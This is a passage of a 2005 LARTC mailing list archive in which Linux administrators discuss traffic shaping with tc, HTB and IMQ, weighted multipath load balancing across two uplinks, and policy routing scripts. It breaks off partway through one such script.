<41FE2910.90908@askarali.info> Hi list gurus, long story short we have firewall machine which is the default gateway for our clients and firewall send traffic out to Internet via cisco router. On cisco we have two serial interfaces 1Mb and 2Mb. On firewall #route add default gw xxx.xxx.xx.xxx (for 2mb) #route add default gw xxx.xxx.xx.xxx (for 1mb) and the same rule for Imb link route packets via these two links. However I don't know what kernel do when sending traffic via these two "default routes" however im sure kernel not doing some sorta shapping, coz after few hours of these two rules our 1mb link got chocked and we have to "route delete default gw xxx.xxx.xx (1mb). Now what I want may be "shapping" to route 70% traffic via 2Mb and 30 via 1Mb. Is this possible via iproute2? if yes I will greatly appreciate if someone helps newbie to iproute2 :) regards Askar From Denis Kot Mon Jan 31 13:06:11 2005 From: Denis Kot (Denis Kot) Date: Mon, 31 Jan 2005 15:06:11 +0200 Subject: [LARTC] traffic in default class Message-ID: <3cfad9ca05013105066d5b357c@mail.gmail.com> how to see which packets is going in to default class? -- Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From jesper@ballbreaker.dk Mon Jan 31 13:48:18 2005 From: jesper@ballbreaker.dk (Jesper Lund) Date: Mon, 31 Jan 2005 14:48:18 +0100 Subject: [LARTC] load balancing between two default gateways In-Reply-To: <41FE2910.90908@askarali.info> References: <41FE2910.90908@askarali.info> Message-ID: <20050131144818.2695e935.jesper@ballbreaker.dk> > Now what I want may be "shapping" to route 70% traffic via 2Mb and > 30 via 1Mb. > Is this possible via iproute2? if yes I will greatly appreciate if > someone helps newbie to iproute2 :) You can read the multipath routing section on lartc.org - Click on "Dive in" :) /Jesper From andre.correa@pobox.com Mon Jan 31 13:55:36 2005 From: andre.correa@pobox.com (Andre Correa) Date: Mon, 31 Jan 2005 11:55:36 -0200 Subject: [LARTC] simple questions about imq In-Reply-To: <41FD1304.1080305@sch.bme.hu> References: <41FD1304.1080305@sch.bme.hu> Message-ID: <41FE38D8.7070506@pobox.com> Cool Toth, please let us know if you make it work. Just take care to hook IMQ in the right place if you are doing NAT. You can choose to hook it after or before NAT. Good luck! Andre Tóth Nándor wrote: > Hi! > > I have read all informations i could find, but some things are still not > clear. > > My setup is: > ---INTERNET1(eth0)-\ /- Local net1 (eth2) > GW > ---INTERNET2(eth1)-/ \- Local net2 (eth3) > > I have NAT and a working setup using HTB,SFQ, classifying with the > iptables -j CLASSIFY way. I shape only the traffic coming from the > internet heading to the intranet. > > I would like to have a configuration like this: > ---INTERNET1(eth0)-\ /- Local net1 (eth2) > GW--imq0 > ---INTERNET2(eth1)-/ \- Local net2 (eth3) > > I think it can be done this way: > iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0 > iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0 > > But it would include traffic heading to the gateway directly, wouldn't > it? Can i put these rules to the POSTROUTING chain? > > And i can still have my CLASSIFY targets in the POSTROUTING chain, > because IMQ queing will happen after it according to > http://lartc.org/howto/lartc.imq.html. > So for example: > $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY --set-class > 1:30 > $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY --set-class > 1:30 > $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN > $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN > > If i managed to do this, i promise, i will document it to the imq wiki. > > Any advice/help is appreciated! > From Denis Kot Mon Jan 31 14:04:38 2005 From: Denis Kot (Denis Kot) Date: Mon, 31 Jan 2005 16:04:38 +0200 Subject: [LARTC] traffic in default class In-Reply-To: <20050131144907.596b412a.jesper@ballbreaker.dk> References: <3cfad9ca05013105066d5b357c@mail.gmail.com> <20050131144907.596b412a.jesper@ballbreaker.dk> Message-ID: <3cfad9ca05013106044128e628@mail.gmail.com> as I wrote before (in another message to list): tc qdisc add dev imq0 root handle 1: htb default 30 tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit then: iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0 tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22 so how to see which packets is going in to default class? On Mon, 31 Jan 2005 14:49:07 +0100, Jesper Lund wrote: > > how to see which packets is going in to default class? > > Depends on how you filter packets, tc ? iptables ? MARK ? CLASSIFY ? > > /Jesper > -- Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From stef.coene@docum.org Mon Jan 31 16:15:15 2005 From: stef.coene@docum.org (Stef Coene) Date: Mon, 31 Jan 2005 17:15:15 +0100 Subject: [LARTC] Anyone have the userguide's tc script and the corresponding ethloop input files? In-Reply-To: <20050131032629.71345.qmail@web15507.mail.cnb.yahoo.com> References: <20050131032629.71345.qmail@web15507.mail.cnb.yahoo.com> Message-ID: <200501311715.15302.stef.coene@docum.org> On Monday 31 January 2005 04:26, CcM wrote: > I'm trying to get picture from ethloop and gnuplot. But the output seems > weird. I still do not know why and want some examples. > > Thanks in advance. This is the only script I found. It uses monitor.pl that I use to get the counters. But you can also see the original code from Devik in comments that uses ethloop. I hope this will help you. burst.sh is a script that creates the tc setup I want to test. client1 and client2 are actually ttcp commands to generate traffic. So the script launchs 2 programs to generate traffic, monitor.pl to get some counters, kills the running ttcp programs, parse the output and use gnuplot to plot it. # set -x CEIL="1000kbps" ./burst.sh $CEIL (sleep 3 ; ./client1 ) & (sleep 6 ; ./client2 ) & monitor.pl end=30 sleep=500000 kill `ps -ef | grep ttcp | awk '{print $3}'` kill `ps -ef | grep ttcp | awk '{print $2}'` DATA=/tmp/bb_speed.log PIX="OUT.png" #DATA=$1.out #PROG=$1 #PIX=$2.png #if [ "$2" = "" ]; then PIX=$1.png; fi #ethloop < $1 > $1.out #cat >.plotperl <<"EOF" #$ln=0; $lx=-1000; #while (<>) { #if(/^(\d+)\s+R\s+(\d+)\s+(\d+)/) { #$x = $1/1000; $y = -0.1; $y1 = $y+0.02; $y2 = $y + 0.05; #if ($x-$lx<2) { $ln=($ln+1)%3; } else { $ln=0; } #$y-=$ln*0.04; $lx=$x; $lb=$3; #$lb=int($3/1000)."k" if ($lb>=10000); #print "set label '$2:$lb' at $x,graph $y center\n"; #print "set arrow from $x,graph $y1 to $x,graph $y2\n"; #} #} #EOF #perl .plotperl $PROG > .plot cat >.plot < References: Message-ID: <200501311716.59454.stef.coene@docum.org> On Sunday 30 January 2005 16:00, rsenykoff@harrislogic.com wrote: > Hello everyone! > > I'm simply trying to put a PRIO inside an HTB (used to throttle). I've got > interactive traffic on the network that I want to give priority (VoIP + > Citrix + Video). > > I've used the filters in a CBQ script fine, but am having trouble > adjusting them to this setup such that they properly assign the traffic. > > tc qdisc del root dev $e > > tc qdisc add dev $e root handle 1: htb default 3 > > tc class add dev $e parent 1: classid 1:1 htb rate $wanRate > > # now that we've throttled the interface, we create the PRIO queue > tc qdisc add dev $e parent 1:1 handle 10: prio > # instantly creates classes 10:1, 10:2, 10:2 > > tc qdisc add dev $e parent 10:1 handle 1: pfifo > tc qdisc add dev $e parent 10:2 handle 2: pfifo > tc qdisc add dev $e parent 10:3 handle 3: sfq > > ############### VoIP ################ > > # IAX # this is the old format - IAX2 should be what's really seen going > on > tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 5036 > 0xffff flowid 10:1 > tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 5036 > 0xffff flowid 10:1 > > # IAX2 # > tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 4569 > 0xffff flowid 10:1 > tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 4569 > 0xffff flowid 10:1 > > # match icmp echo request > tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type > 0x08 0xff flowid 10:1 > > # match icmp echo reply > tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type > 0x00 0xff flowid 10:1 > > ## etc........... Where do you redirect the traffic to the prio qdisc ?????? Stef From sko@uiuc.edu Mon Jan 31 16:49:14 2005 From: sko@uiuc.edu (Steven Y. Ko) Date: Mon, 31 Jan 2005 10:49:14 -0600 Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)? Message-ID: > Maybe: > # ip forward is a must for a gateway > echo "1" > /proc/sys/net/ipv4/ip_forward I'm sorry that I forgot mentioning that I turned it on. Also there's no firewall, either. Thank you so much for your answer, though. I'm still figuring out how to do it. - Steve From nug@sch.bme.hu Mon Jan 31 16:59:24 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Mon, 31 Jan 2005 17:59:24 +0100 Subject: [LARTC] simple questions about imq In-Reply-To: <41FE38D8.7070506@pobox.com> References: <41FD1304.1080305@sch.bme.hu> <41FE38D8.7070506@pobox.com> Message-ID: <41FE63EC.4090806@sch.bme.hu> Hi! Andre Correa wrote: > > Cool Toth, please let us know if you make it work. Just take care to > hook IMQ in the right place if you are doing NAT. You can choose to hook > it after or before NAT. Where can i set it? Can you answer my questions below? I will document these things, if i managed to do it. -- Udv, Nandor > Tóth Nándor wrote: > >> Hi! >> >> I have read all informations i could find, but some things are still >> not clear. >> >> My setup is: >> ---INTERNET1(eth0)-\ /- Local net1 (eth2) >> GW >> ---INTERNET2(eth1)-/ \- Local net2 (eth3) >> >> I have NAT and a working setup using HTB,SFQ, classifying with the >> iptables -j CLASSIFY way. I shape only the traffic coming from the >> internet heading to the intranet. >> >> I would like to have a configuration like this: >> ---INTERNET1(eth0)-\ /- Local net1 (eth2) >> GW--imq0 >> ---INTERNET2(eth1)-/ \- Local net2 (eth3) >> >> I think it can be done this way: >> iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0 >> iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0 >> >> But it would include traffic heading to the gateway directly, wouldn't >> it? Can i put these rules to the POSTROUTING chain? >> >> And i can still have my CLASSIFY targets in the POSTROUTING chain, >> because IMQ queing will happen after it according to >> http://lartc.org/howto/lartc.imq.html. >> So for example: >> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY >> --set-class 1:30 >> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY >> --set-class 1:30 >> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN >> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN >> >> If i managed to do this, i promise, i will document it to the imq wiki. >> >> Any advice/help is appreciated! >> > From nug@sch.bme.hu Mon Jan 31 17:02:32 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Mon, 31 Jan 2005 18:02:32 +0100 Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)? In-Reply-To: References: Message-ID: <41FE64A8.8010408@sch.bme.hu> Hi! Steven Y. Ko wrote: >>Maybe: >># ip forward is a must for a gateway >>echo "1" > /proc/sys/net/ipv4/ip_forward > > > I'm sorry that I forgot mentioning that I turned it on. Also > there's no firewall, either. Thank you so much for your > answer, though. I'm still figuring out how to do it. It should work. If i were you, i would play with tcpdump a little bit, to narrow where the problem is. -- Udv, Nandor From andre.correa@pobox.com Mon Jan 31 17:10:33 2005 From: andre.correa@pobox.com (Andre Correa) Date: Mon, 31 Jan 2005 15:10:33 -0200 Subject: [LARTC] simple questions about imq In-Reply-To: <41FE63EC.4090806@sch.bme.hu> References: <41FD1304.1080305@sch.bme.hu> <41FE38D8.7070506@pobox.com> <41FE63EC.4090806@sch.bme.hu> Message-ID: <41FE6689.1050402@pobox.com> IMQ hooking is set on kernel config, there is an option for "IMQ behavior". Make sure you are using a recent patch version. let me know if we can help you somehow... Cheers. Andre Tóth Nándor wrote: > Hi! > > Andre Correa wrote: > >> >> Cool Toth, please let us know if you make it work. Just take care to >> hook IMQ in the right place if you are doing NAT. You can choose to >> hook it after or before NAT. > > > Where can i set it? > Can you answer my questions below? > > I will document these things, if i managed to do it. > From tatooin@kelkoo.com Mon Jan 31 17:25:52 2005 From: tatooin@kelkoo.com (Vincent Jaussaud) Date: Mon, 31 Jan 2005 18:25:52 +0100 Subject: [LARTC] iproute-save ? In-Reply-To: <20050128091239.102bec97@bugs> References: <20050128091239.102bec97@bugs> Message-ID: <1107192352.2846.340.camel@tatooin.kelkoo.net> --=-FNKQEKXUTWVbDLFH5A1/ Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Fri, 2005-01-28 at 09:12 +0200, raptor@tvskat.net wrote: > Anyone to know iproute-save, iproute-restore like script similar iptables= -save/restore ? > that stores everytihng routes,rules,tables everything ...=20 > then init.d-script that among other things stores the state on shutdown := ") (thats easy then) >=20 I wrote something like that: http://washington.kelkoo.net/iprvss/ I'm using it, to manage the policy routing setup of my company (around 25 firewalls / routers). I've been using it since several years with different scenarios, and so far without issues.=20 Let me know if you have problem with it. There is no init script at that time, unfortunately, but it should be quite easy to make one, or use rc.local to call it. Regards, >=20 > ----- > http://linuxtoday.com/news_story.php3?ltsn=3D2004-12-08-004-32-OS-BZ-DT-0= 005 > snip> MS Office is popular in the same way as heart disease is the most p= opular way to die. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ --=20 Vincent Jaussaud Kelkoo.com Security Manager=20 email: tatooin@kelkoo.com GPG key: 1024D/3BFE3FC7 2002-02-07 "Those who desire to give up freedom in order to gain security will not have, nor do they deserve, either one." -- President Thomas Jefferson. 1743-1826 --=-FNKQEKXUTWVbDLFH5A1/ Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.6 (GNU/Linux) iD8DBQBB/mog6N3/JTv+P8cRAngQAJwO7apBS7dR5wsffwbKWkUQGHVxEwCfSf5z q4kh1u/aL9l2ylO+yDZikD0= =zc8D -----END PGP SIGNATURE----- --=-FNKQEKXUTWVbDLFH5A1/-- From Alf.Vahau@upng.ac.pg Mon Jan 31 18:14:34 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Tue, 01 Feb 2005 04:14:34 +1000 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E2DBE0.7070403@routehat.org> References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> <41E2DBE0.7070403@routehat.org> Message-ID: <41FE758A.4050805@upng.ac.pg> >However, there is a possibility if you want to find the computer by IP, if you use manageable switches. As you know which >IPs are improper, you can also find the corresponding MAC address passively from the router's ARP table (or actively by >arping), and the switches will be able to tell you on which port this MAC is plugged. Then you can e.g. shutdown the port or >follow the cable to the physical computer location. Just reporting back on how this went. The above worked beautifully and the suspect PC has been identified. Two puzzling aspect which I hope the list will throw some light on is: 1. The ipconfig /all command on Windows returns the description of the NIC with company A but the MAC address contains the code for company B according to OUI scheme. http://standards.ieee.org/regauth/oui/oui.txt Is this an industry practice? Both IP and MAC addresses match that of the investigated computer. 2. Our proxy access logs show that sites C and D were heavily accessed. The browser history shows site shows D being accessed but not a trace of access to C. I am suspecting an ftp server being used. Thanks in advance for the help. alfred, -- Perl - "... making the easy jobs easy, without making the hard jobs impossible." 'The Camel', 3ed From rsenykoff@harrislogic.com Mon Jan 31 19:03:25 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Mon, 31 Jan 2005 13:03:25 -0600 Subject: [LARTC] load balancing between two default gateways In-Reply-To: <20050131144818.2695e935.jesper@ballbreaker.dk> Message-ID: > Now what I want may be "shapping" to route 70% traffic via 2Mb and > 30 via 1Mb. > Is this possible via iproute2? if yes I will greatly appreciate if > someone helps newbie to iproute2 :) You can read the multipath routing section on lartc.org - Click on "Dive in" :) I've been running load balancing between my cable modem and dsl. It works pretty well actually. Here's a link to the script I use: http://www.burnpc.com/website.nsf/all/FE5F4F294F508EB786256E600019BC30 I also use the load balancer to do NAT between the subnet of the cable modem, subnet of DSL, and subnet my boxes are on. Also in there are some static route rules in case you always want to use a particular connection for certain traffic. In my case, my DSL modem is used for VPNs to work (Linksys BEFVP41) so I always send traffic for those IPs out through the appropriate NIC. To try to achieve the 70 / 30 rule I recommend doing something like this to the line ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1 weight 1 nexthop via $GWE2 dev $IFE2 weight 1 ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1 weight 7 nexthop via $GWE2 dev $IFE2 weight 3 I suggest reading up on the documentation to understand what those weight parameters really do. In essence they add 7 routes via one interface, and 3 via the other. Then the load balancer round-robbins between them. The easynews piece in there works in conjunction with Flashget. I set flashget's multiproxy up, and it will create multiple threads over the two ports. I'm able to download from easynews then at the total combined speed of the connections ==== fast!!! Let me know if you have any questions, -Ron From gdamjan@mail.net.mk Mon Jan 31 22:23:09 2005 From: gdamjan@mail.net.mk (Damjan) Date: Mon, 31 Jan 2005 23:23:09 +0100 Subject: [LARTC] How to bond pppoe links Message-ID: <20050131222309.GA31550@legolas.on.net.mk> I have three ADSL lines that I'd like to use as one big pipe to the internet. The ADSL service works by establishing a pppoe connection (the ADSL "modem" is a bridge), and each pppoe interface gets its own IP address. This means I'd have to have 4 ethernet interfaces (3 for each of the ADSL modems and 1 for the LAN) in my gateway. I'd setup the gateway to NAT the LAN computers. Now, I'm not completely sure how would this work, and what to expect. Any suggestions from someone that has done this (or similar scenario)? -- damjan | дамјан This is my jabber ID --> damjan@bagra.net.mk <-- not my mail address!!! From mihaivlad@web-profile.net Mon Jan 31 22:27:44 2005 From: mihaivlad@web-profile.net (Mihai Vlad) Date: Tue, 1 Feb 2005 00:27:44 +0200 Subject: [LARTC] Number of connections decreasing performance ! Message-ID: Hello again, I am stuck with this problem: I have: One Linux NAT Box. One internet connection. 100 clients in the LAN. Test 1: - Connect only one client to the server and download from it a file. -> The total speed recorded on the server is maximum (as expected - let's say 128KB) Test 2: - Connect all 100 clients (somewhere in the evening) and let them browse - download, etc - Try to download the same file from the same client to make sure that the bandwidth is used at it's maximum capacity -> The total speed recorded on the server is half then before (around 64KB) There is no load on the server (uptime shows 0.00 0.00 0.00) I changed distributions and hardware to make sure... I changed the computer to a P4 2GHz - 512 RAM The same problem appears during high traffic hours. Can u tell me if there is a limit in how many connection a Linux router might serve? Can u spot another problem that might decrease the speed in such a way? Please help... I am lost! I cannot see where the problem is... Thanks in advance, Mihai VLAD From andy.furniss@dsl.pipex.com Mon Jan 31 23:17:14 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Mon, 31 Jan 2005 23:17:14 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <200501291829.44294.rio@martin.mu> References: <200501191657.15767.rio@martin.mu> <200501281347.35551.rio@martin.mu> <41FADF0B.4030508@dsl.pipex.com> <200501291829.44294.rio@martin.mu> Message-ID: <41FEBC7A.5030405@dsl.pipex.com> Rio Martin. wrote: > On Saturday 29 January 2005 00:55, Andy Furniss wrote: > >>>I ve tried this before, but never succeed. I didnt know where should i >>>attach the 10:100 class. In the document, just told to add this class in >>>tc, without giving some information which interface should i attach this >>>class. >> >>I've not used squid, but think the idea is to shape on eth0 traffic from >>inet to lan and miss traffic from squid to lan. The patch lets you >>classify miss traffic from squid which you make an htb class for and you >>can then involve it in sharing/priorotising etc with other inet to lan >>traffic. >>Andy. > > > > Thanks Andy for the info u gave, > But the patch is totally missed with Squid-2.5.STABLE7, so i have to do it > manually. > > I tried to placed this 10:100 class into eth0 (inet interface) and > successfully do some shaping on outgoing request from squid to origin server > where client request. > It wont shape the incoming from origin server to squid. > As u see, this is tcp_outgoing_priority, not tcp_incoming_priority.. :)) > > so i still have to figure out more how to shape incoming packets to this squid > proxy. Ahh - I thought that squid could limit connections based on the rate the client could sustain. You can shape incoming to squid with imq if hooked after nat, because its traffic will have real dst address - other will have been denatted. If you want to further shape traffic to squid (eg by what local address requested or connected to/was directed to) then I can't think of a way. Andy. > > - Rio.Martin - > From windtim@libero.it Mon Jan 31 23:24:23 2005 From: windtim@libero.it (windtim) Date: Tue, 01 Feb 2005 00:24:23 +0100 Subject: [LARTC] MPLS QoS Message-ID: <41FEBE27.4050507@libero.it> Hi, i'm testing QoS MPLS on IP network. I'm confusing about what are features that permit Multi Protocol Label Switching to support QoS on a network. Can you clarify me it? In particular about the integration between MPLS and DiffServe Thanks in advance for the help From andy.furniss@dsl.pipex.com Mon Jan 31 23:39:12 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Mon, 31 Jan 2005 23:39:12 +0000 Subject: [LARTC] simple questions about imq In-Reply-To: <41FD1304.1080305@sch.bme.hu> References: <41FD1304.1080305@sch.bme.hu> Message-ID: <41FEC1A0.9040909@dsl.pipex.com> Tóth Nándor wrote: > Hi! > > I have read all informations i could find, but some things are still not > clear. > > My setup is: > ---INTERNET1(eth0)-\ /- Local net1 (eth2) > GW > ---INTERNET2(eth1)-/ \- Local net2 (eth3) > > I have NAT and a working setup using HTB,SFQ, classifying with the > iptables -j CLASSIFY way. I shape only the traffic coming from the > internet heading to the intranet. > > I would like to have a configuration like this: > ---INTERNET1(eth0)-\ /- Local net1 (eth2) > GW--imq0 > ---INTERNET2(eth1)-/ \- Local net2 (eth3) > > I think it can be done this way: > iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0 > iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0 > > But it would include traffic heading to the gateway directly, wouldn't > it? Yes - but people often want this. Can i put these rules to the POSTROUTING chain? > > And i can still have my CLASSIFY targets in the POSTROUTING chain, > because IMQ queing will happen after it according to > http://lartc.org/howto/lartc.imq.html. > So for example: > $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY --set-class > 1:30 > $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY --set-class > 1:30 > $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN > $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN > > If i managed to do this, i promise, i will document it to the imq wiki. > > Any advice/help is appreciated! > You need to jump to imq in postrouting, classify should be done first ok try and see. If you only want to shape forwarded traffic you could mark/classify using -i and -o in forward and then match on mark/class and -j IMQ in postrouting, it will only really matter if you have shaper to lan traffic you want to exclude from imq. I don't see why you are classifying to the same class or need return. If you have two seperate internet links you still need two nonsharing queues added to the imq device. Andy. From askar@askarali.info Tue Feb 1 04:45:25 2005 From: askar@askarali.info (Askar) Date: Tue, 01 Feb 2005 09:45:25 +0500 Subject: [LARTC] load balancing between two default gateways In-Reply-To: References: Message-ID: <41FF0965.8010803@askarali.info> rsenykoff@harrislogic.com wrote: > > > > > >>Now what I want may be "shapping" to route 70% traffic via 2Mb and >>30 via 1Mb. >>Is this possible via iproute2? if yes I will greatly appreciate if >>someone helps newbie to iproute2 :) >> >> > >You can read the multipath routing section on lartc.org - Click on >"Dive in" :) > > >I've been running load balancing between my cable modem and dsl. It works >pretty well actually. Here's a link to the script I use: > >http://www.burnpc.com/website.nsf/all/FE5F4F294F508EB786256E600019BC30 > >I also use the load balancer to do NAT between the subnet of the cable >modem, subnet of DSL, and subnet my boxes are on. Also in there are some >static route rules in case you always want to use a particular connection >for certain traffic. In my case, my DSL modem is used for VPNs to work >(Linksys BEFVP41) so I always send traffic for those IPs out through the >appropriate NIC. > >To try to achieve the 70 / 30 rule I recommend doing something like this to >the line >ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1 >weight 1 nexthop via $GWE2 dev $IFE2 weight 1 > >ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1 >weight 7 nexthop via $GWE2 dev $IFE2 weight 3 > >I suggest reading up on the documentation to understand what those weight >parameters really do. In essence they add 7 routes via one interface, and 3 >via the other. Then the load balancer round-robbins between them. > >The easynews piece in there works in conjunction with Flashget. I set >flashget's multiproxy up, and it will create multiple threads over the two >ports. I'm able to download from easynews then at the total combined speed >of the connections ==== fast!!! > >Let me know if you have any questions, >-Ron > >_______________________________________________ >LARTC mailing list / LARTC@mailman.ds9a.nl >http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > Thanks for the quick reply, okay i will let you know after reading the docs section you suggested. before going to deploy these ip rule on our production envirnoment I have few questions. we are also doing iproute2 + iptables MARKing on this machine to route port 80 traffic to our proxy/cache servers. Now the ip rules you suggested will not do anything with those already in place okay? #ip rule show 32764: from all fwmark 0x4 lookup wwwPcache.out <--- we have three like this . . Second to make the ip rule working I still need the convention "route" in place before doing ip rule things? # route add default gw xxx.xxx.xxx.xx ? regards Askar From rio@martin.mu Tue Feb 1 12:37:24 2005 From: rio@martin.mu (Rio Martin.) Date: Tue, 1 Feb 2005 12:37:24 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <41FEBC7A.5030405@dsl.pipex.com> References: <200501191657.15767.rio@martin.mu> <200501291829.44294.rio@martin.mu> <41FEBC7A.5030405@dsl.pipex.com> Message-ID: <200502011237.24386.rio@martin.mu> On Monday 31 January 2005 23:17, Andy Furniss wrote: > Ahh - I thought that squid could limit connections based on the rate the > client could sustain. > You can shape incoming to squid with imq if hooked after nat, because > its traffic will have real dst address - other will have been denatted. Could you give me some example, how to do that? Thanks .. - Rio.Martin - From nug@sch.bme.hu Tue Feb 1 05:44:17 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 01 Feb 2005 06:44:17 +0100 Subject: [LARTC] simple questions about imq In-Reply-To: <41FEC1A0.9040909@dsl.pipex.com> References: <41FD1304.1080305@sch.bme.hu> <41FEC1A0.9040909@dsl.pipex.com> Message-ID: <41FF1731.70201@sch.bme.hu> Hi! Andy Furniss wrote: > Can i put these rules to the POSTROUTING chain? > >> >> And i can still have my CLASSIFY targets in the POSTROUTING chain, >> because IMQ queing will happen after it according to >> http://lartc.org/howto/lartc.imq.html. >> So for example: >> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY >> --set-class 1:30 >> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY >> --set-class 1:30 >> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN >> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN >> >> If i managed to do this, i promise, i will document it to the imq wiki. >> >> Any advice/help is appreciated! >> > > You need to jump to imq in postrouting, classify should be done first ok > try and see. Ok will try it. > If you only want to shape forwarded traffic you could mark/classify > using -i and -o in forward and then match on mark/class and -j IMQ in > postrouting, it will only really matter if you have shaper to lan > traffic you want to exclude from imq. > > I don't see why you are classifying to the same class or need return. If > you have two seperate internet links you still need two nonsharing > queues added to the imq device. Yes, i have two non-sharing queues(*) now, too. I mark the packets in PREROUTING, so i can classify them to the appropiate queue in postrouting. The rules up there are just examples. I need RETURN, because i have overlapping rules, so packets would be classified twice (the second classify will be the valid, isn't it?). Like: $IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --syn -m length --length 40:68 -j CLASSIFY --set-class 1:9 $IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --syn -m length --length 40:68 -j RETURN $IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --dport 22 -j CLASSIFY --set-class 1:10 $IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --dport 22 -j RETURN Is this a stupid way to do this? I get this from the LARTC howto :) http://lartc.org/howto/lartc.cookbook.fullnat.intro.html "We have done a -j RETURN so packets don't traverse all rules" Thanks, for the clarifying! -- Udv, Nandor * If anyone is curious: HTB main 5000+120+250kbps --- Child1 5000kbps for the DMZ --- Child2 120kbps first internet line --- Child3 250 kbps second internet line From nug@sch.bme.hu Tue Feb 1 06:00:36 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 01 Feb 2005 07:00:36 +0100 Subject: [LARTC] multiple uplinks example script Message-ID: <41FF1B04.5020706@sch.bme.hu> Hi! I had two uplinks till today. We stopped one of them today, so i thought i could share my experience. (it is maybe useful for somebody) I hadn't managed to configure it using a LARTC howto, but the Nano-howto (http://www.ssi.bg/~ja/nano.txt) and julian's kernel patches. I had some problems with icq connections, because it is a two step connection (It is just theory). 1. Client --> Main server 2. Main Server --> Client ; Main server -> small server 3. Client -> small server The problem is, when connection 1. use different uplink then connection 2. Those icq related rules below corrected the problem. My script: IF0=eth2 IF1=eth1 IF2=eth3 IF3=eth0 P0_NET=192.168.1.0/24 P1_NET=public1 P2_NET=public2 IP0=192.168.1.254 IP1=publicip1 IP2=publicip1 #gateway P1=publicgw1 P2=publicgw2 #table T1=211 T2=212 T3=222 IP=/sbin/ip # Delete everything #$IP route flush cache $IP route flush all $IP route flush all table $T1 $IP route flush all table $T2 $IP route flush all table $T3 #icq rules $IP rule delete prio 48 to 205.188.0.0/16 table $T1 $IP rule delete prio 49 to 64.12.161.153 table $T1 $IP rule delete prio 49 to 64.12.0.0/16 table $T1 $IP rule delete prio 50 table main $IP rule delete prio $T3 table $T3 $IP rule delete prio $T1 from $P1_NET table $T1 $IP rule delete prio $T2 from $P2_NET table $T2 # The default table $IP route add $P0_NET dev $IF0 src $IP0 $IP route add $P1_NET dev $IF1 src $IP1 $IP route add $P2_NET dev $IF2 src $IP2 # For stable icq connections $IP rule add prio 48 to 205.188.0.0/16 table $T1 #$IP rule add prio 49 to 64.12.161.153 table $T1 $IP rule add prio 49 to 64.12.0.0/16 table $T1 $IP rule add prio 50 table main $IP route del default table main $IP 